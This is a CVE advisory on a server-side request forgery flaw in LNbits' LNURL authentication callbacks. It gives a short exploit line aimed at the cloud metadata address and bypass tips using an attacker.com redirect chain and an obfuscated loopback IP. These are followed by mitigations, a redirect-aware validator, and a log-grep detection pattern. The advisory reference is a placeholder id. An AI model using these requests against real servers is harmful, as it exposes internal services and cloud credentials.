How CVE-2025-32013 Works
The vulnerability in LNbits stems from improper validation of user-supplied callback URLs during LNURL authentication. When processing authentication requests, the application uses the `httpx` library to fetch external resources without proper URL sanitization. Attackers can craft malicious LNURLs whose callback points at internal IP addresses or restricted endpoints (e.g., `http://127.0.0.1/admin`). Because the server also follows HTTP redirects, the request can be steered to internal services, cloud metadata APIs, or other sensitive endpoints. The absence of network-layer restrictions or allowlist validation makes the SSRF exploitable, potentially leading to data leaks or internal network reconnaissance.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: LNbits
Version: Pre-1.12.0
Vulnerability: SSRF via LNURL
Severity: Critical
Date: 2025-04-06
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Exploitation:</h2>
<h2 style="color: blue;">1. Craft malicious LNURL:</h2>
```python
import requests

# LNURL-auth request whose callback parameter points at the cloud metadata address
mal_url = "https://lnbits.com/api/v1/lnurl/auth?callback=http://169.254.169.254/latest/meta-data"
response = requests.get(mal_url)
```
2. Bypass filters: Use redirect chains (`http://attacker.com/redirect` → `http://localhost`) or obfuscated IPs (`0x7f000001`).
Mitigation:
1. Patch: Upgrade to LNbits 1.12.0+.
2. Network hardening:
```nginx
# Refuses inbound requests to the LNURL endpoint from these client source addresses.
# It does not constrain the server's own outbound callback fetches, which need
# egress filtering at the host or network layer.
location /api/v1/lnurl {
    deny 127.0.0.1;
    deny 10.0.0.0/8;
}
```
3. Code fix: Validate URLs via regex:
```python
import re

# Dot escaped and host anchored, so "lnbits.org.attacker.example" or "xlnbits.org" no longer match
ALLOWED_DOMAINS = re.compile(r'^https?://([a-z0-9-]+\.)*lnbits\.org(?::\d+)?(?:/|$)', re.IGNORECASE)

def check_callback_url(url: str) -> str:
    if not ALLOWED_DOMAINS.match(url):
        raise ValueError("Invalid URL")
    return url
```
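As an added example from the defender's side (written here, not LNbits' own code): a Python callback validator and `httpx` fetch wrapper that resolves the host and rejects private, loopback and link-local destinations (which covers the metadata address and the obfuscated `0x7f000001` form, since the resolver turns it into `127.0.0.1`), and that walks redirects manually so every hop is re-checked, closing the redirect-chain bypass described above. The function names (`validate_callback`, `is_rejected`, `fetch_callback`), the injectable resolver, and the https-only rule are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def _resolve(host):  # default resolver: every A/AAAA answer; needs working DNS
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_ip(ip_text):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast

def validate_callback(url, resolve=_resolve):
    """Return url if safe to fetch, else raise ValueError (SSRF guard).
    Rejects non-https URLs, credentials, and hosts whose literal or resolved
    addresses are private, loopback or link-local (covers 169.254.169.254).
    """
    parts = urlsplit(url)
    if parts.scheme != "https":  # assumption: https-only callback policy
        raise ValueError("callback must use https")
    if parts.username or parts.password or not parts.hostname:
        raise ValueError("callback host missing or carries credentials")
    host = parts.hostname
    try:
        addrs = {str(ipaddress.ip_address(host))}
    except ValueError:  # not a literal (e.g. a name or 0x7f000001): resolve it
        addrs = set(resolve(host))
    if not addrs or not all(is_public_ip(a) for a in addrs):
        raise ValueError(f"callback resolves to a non-public address: {host}")
    return url

def is_rejected(url, resolve=_resolve):
    """True when validate_callback refuses url."""
    try:
        validate_callback(url, resolve)
        return False
    except ValueError:
        return True

def fetch_callback(url, resolve=_resolve):
    """Fetch with automatic redirects off, re-validating every hop (needs httpx)."""
    import httpx  # imported here so the validator works without httpx installed
    with httpx.Client(follow_redirects=False, timeout=5.0) as client:
        for _ in range(4):  # assumption: at most 3 redirect hops
            resp = client.get(validate_callback(url, resolve))
            if not resp.is_redirect:
                return resp
            url = str(resp.url.join(resp.headers["location"]))
    raise ValueError("too many redirects")
```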
Detection:
1. Log analysis:
```shell
grep -E 'GET /api/v1/lnurl.*(127\.0\.0\.1|192\.168\.|10\.)' /var/log/lnbits/access.log
```
2. WAF rules: Block requests with internal IPs in query strings.
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- CVSS 4.0 Vector: `AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N`
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-32013